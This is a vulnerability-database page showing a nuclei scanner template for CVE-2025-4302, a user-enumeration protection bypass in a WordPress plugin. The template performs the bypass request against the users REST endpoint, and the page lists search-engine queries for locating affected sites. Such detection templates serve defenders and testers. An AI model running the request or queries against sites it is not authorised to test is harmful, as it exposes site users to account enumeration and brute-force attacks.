Lucene search
K

Stop User Enumeration WordPress plugin - Authentication Bypass

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Authentication bypass in Stop User Enumeration plugin before 1.7.3 via encoded users REST endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-4302
17 Jul 202510:43
circl
CNNVD
WordPress plugin Stop User Enumeration 安全漏洞
17 Jul 202500:00
cnnvd
CNVD
Unspecified Vulnerability in WordPress Stop User Enumeration plugin
23 Jul 202500:00
cnvd
CVE
CVE-2025-4302
17 Jul 202507:37
cve
Cvelist
CVE-2025-4302 Stop User Enumeration < 1.7.3 - Protection Bypass
17 Jul 202507:37
cvelist
EUVD
EUVD-2025-21758
3 Oct 202520:07
euvd
NVD
CVE-2025-4302
17 Jul 202508:15
nvd
OSV
CVE-2025-4302
17 Jul 202508:15
osv
Patchstack
WordPress Stop User Enumeration plugin < 1.7.3 - Protection Bypass vulnerability
17 Jul 202513:30
patchstack
Positive Technologies
PT-2025-29904
17 Jul 202500:00
ptsecurity
Rows per page
id: CVE-2025-4302

info:
  name: Stop User Enumeration WordPress plugin - Authentication Bypass
  author: Kazgangap
  severity: medium
  description: |
    Stop User Enumeration WordPress plugin < 1.7.3 contains an authentication bypass caused by URL-encoding the REST API path /wp-json/wp/v2/users/, letting attackers bypass user enumeration restrictions, exploit requires crafted URL encoding.
  impact: |
    Attackers can bypass user enumeration protection through URL-encoding manipulation, potentially facilitating brute force attacks against user accounts.
  remediation: |
    Upgrade Stop User Enumeration WordPress plugin to version 1.7.3 or later that properly handles URL-encoded REST API paths.
  reference:
    - https://wpscan.com/vulnerability/19f67d6e-4ffe-4126-ac42-fb23c5017a3e/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-4302.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4302
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-4302
    epss-score: 0.00847
    epss-percentile: 0.53576
  metadata:
    verified: true
    vendor: fullworks
    product: stop-user-enumeration
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/stop-user-enumeration/"
    fofa-query: body=/wp-content/plugins/stop-user-enumeration/
    publicwww-query: "/wp-content/plugins/stop-user-enumeration/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,wpscan,stop-user-enumeration,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Only authenticated users can access the User endpoint REST API")'
          - 'status_code==401'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users?foo=simple-jwt-login"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '{"id":\d,"name":".*","url"'

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f87b9f90a52399efec642cedbbf41141b34050f446986aa47fba3f3b7be189f8022100c28ef5b162b327936408b4f954140db80639626293c893a5bee450b154dc8bf7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00847
SSVC
24